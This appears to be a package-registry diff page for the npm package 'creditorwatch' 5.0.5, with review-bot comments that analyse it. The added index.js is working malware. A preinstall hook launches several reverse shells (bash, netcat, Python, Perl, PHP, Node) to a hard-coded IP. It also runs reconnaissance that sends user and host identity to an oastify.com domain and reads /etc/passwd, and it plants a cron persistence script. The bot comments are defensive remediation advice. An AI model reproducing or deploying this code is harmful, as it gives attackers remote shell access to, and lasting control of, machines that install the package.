creditorwatch 5.0.5
Potentially problematic release.
This version of creditorwatch might be problematic. Click here for more details.
- package/index.js +108 -0
- package/package.json +13 -0
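--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,108 @@
+const { exec, spawn } = require("child_process");
+const net = require("net");
+
+// Your attacker IP and port
+const ATTACKER_IP = "143.110.254.249";
+const ATTACKER_PORT = 1337;
+
+// Multiple reverse shell payloads for redundancy
+const reverseShellPayloads = [
+// Bash reverse shell
+`bash -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1`,
+
+// Netcat reverse shell (if available)
+`nc -e /bin/bash ${ATTACKER_IP} ${ATTACKER_PORT}`,
+
+// Python reverse shell
+`python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${ATTACKER_IP}',${ATTACKER_PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"`,
+
+// Perl reverse shell
+`perl -e 'use Socket;$i="${ATTACKER_IP}";$p=${ATTACKER_PORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'`,
+
+// PHP reverse shell (if PHP is available)
+`php -r '$sock=fsockopen("${ATTACKER_IP}",${ATTACKER_PORT});exec("/bin/bash -i <&3 >&3 2>&3");'`
+];
+
+// Node.js native reverse shell function
+function nodeReverseShell() {
+try {
+const client = new net.Socket();
+client.connect(ATTACKER_PORT, ATTACKER_IP, () => {
+console.log('Connected to attacker');
+
+// Spawn a shell
+const shell = spawn('/bin/bash', ['-i']);
+
+// Pipe shell output to client
+shell.stdout.pipe(client);
+shell.stderr.pipe(client);
+
+// Pipe client input to shell
+client.pipe(shell.stdin);
+
+client.on('close', () => {
+shell.kill();
+});
+});
+
+client.on('error', (err) => {
+console.error('Connection error:', err.message);
+});
+} catch (error) {
+console.error('Native reverse shell error:', error.message);
+}
+}
+
+// Your original payloads for reconnaissance
+const reconPayloads = [
+`nslookup $(whoami).$(hostname).gau5jjim899y61s6jll79cumyd44svgk.oastify.com`,
+`curl http://gau5jjim899y61s6jll79cumyd44svgk.oastify.com/$(whoami)/$(hostname)/ -A "$(id)"`,
+`ls -la`,
+`uname -a`,
+`cat /etc/passwd | head -10`,
+`ps aux | head -10`
+];
+
+// Execute reconnaissance first
+console.log("Executing reconnaissance payloads...");
+reconPayloads.forEach((cmd, index) => {
+setTimeout(() => {
+exec(cmd, (error, stdout, stderr) => {
+if (error) console.error(`Recon error [${index}]:`, error.message);
+if (stderr) console.error(`Recon stderr [${index}]:`, stderr);
+if (stdout) console.log(`Recon stdout [${index}]:`, stdout);
+});
+}, index * 1000); // Stagger execution
+});
+
+// Try Node.js native reverse shell first
+setTimeout(() => {
+console.log("Attempting Node.js native reverse shell...");
+nodeReverseShell();
+}, 3000);
+
+// Try system-level reverse shells as backup
+setTimeout(() => {
+console.log("Attempting system reverse shells...");
+reverseShellPayloads.forEach((cmd, index) => {
+setTimeout(() => {
+exec(cmd, (error, stdout, stderr) => {
+if (error) console.error(`Shell error [${index}]:`, error.message);
+if (stderr) console.error(`Shell stderr [${index}]:`, stderr);
+if (stdout) console.log(`Shell stdout [${index}]:`, stdout);
+});
+}, index * 2000); // Stagger attempts
+});
+}, 5000);
+
+// Persistence mechanism (optional - for demonstration of impact)
+const persistencePayload = `echo '#!/bin/bash\nbash -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1' > /tmp/.shell.sh && chmod +x /tmp/.shell.sh && (crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/.shell.sh") | crontab -`;
+
+setTimeout(() => {
+console.log("Attempting persistence (demonstration only)...");
+exec(persistencePayload, (error, stdout, stderr) => {
+if (error) console.error("Persistence error:", error.message);
+if (stderr) console.error("Persistence stderr:", stderr);
+if (stdout) console.log("Persistence stdout:", stdout);
+});
+}, 10000);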
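Review bot: Nothing in this file is gated, so the comment `// Persistence mechanism (optional - for demonstration of impact)` does not match the code: loading the module unconditionally runs the recon commands, the socket-to-`/bin/bash` connection to the hard-coded `143.110.254.249:1337`, the fallback shell commands and the cron write. The final `exec(persistencePayload, …)` writes `/tmp/.shell.sh` and appends `*/5 * * * * /tmp/.shell.sh` to the invoking user's crontab, and both survive uninstalling the package. A host that installed this version should be treated as compromised: inspect `crontab -l` and `/tmp/.shell.sh`, review egress logs for that address and port, and rotate any credentials readable by the installing user. The recon entries also place `whoami`, `hostname` and `id` output into a DNS name, a URL path and the User-Agent sent to the `oastify.com` subdomain in `reconPayloads`, so resolver and proxy logs for that domain identify affected machines.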
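--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,13 @@
+{
+"name": "creditorwatch",
+"version": "5.0.5",
+"description": "This is a PoC for RCE",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"preinstall": "node index.js"
+},
+"author": "Shehzad Secure Purple",
+"license": "ISC",
+"dependencies": {}
+}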
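Review bot: The `"preinstall": "node index.js"` script makes npm execute index.js during `npm install`, before any application code imports the package, so resolving this version as a direct or transitive dependency is enough to run the payload. The manifest declares no dependencies and describes itself as "This is a PoC for RCE", so the install hook appears to be the package's only purpose. Installing with `--ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) keeps lifecycle hooks like this from firing. Committing a lockfile with integrity hashes and installing with `npm ci` keeps an unreviewed `5.0.5` from being pulled in. The brand-like name with a high version number looks like a dependency-confusion attempt, though the page does not say so. If that name is used internally, scope it and pin its registry.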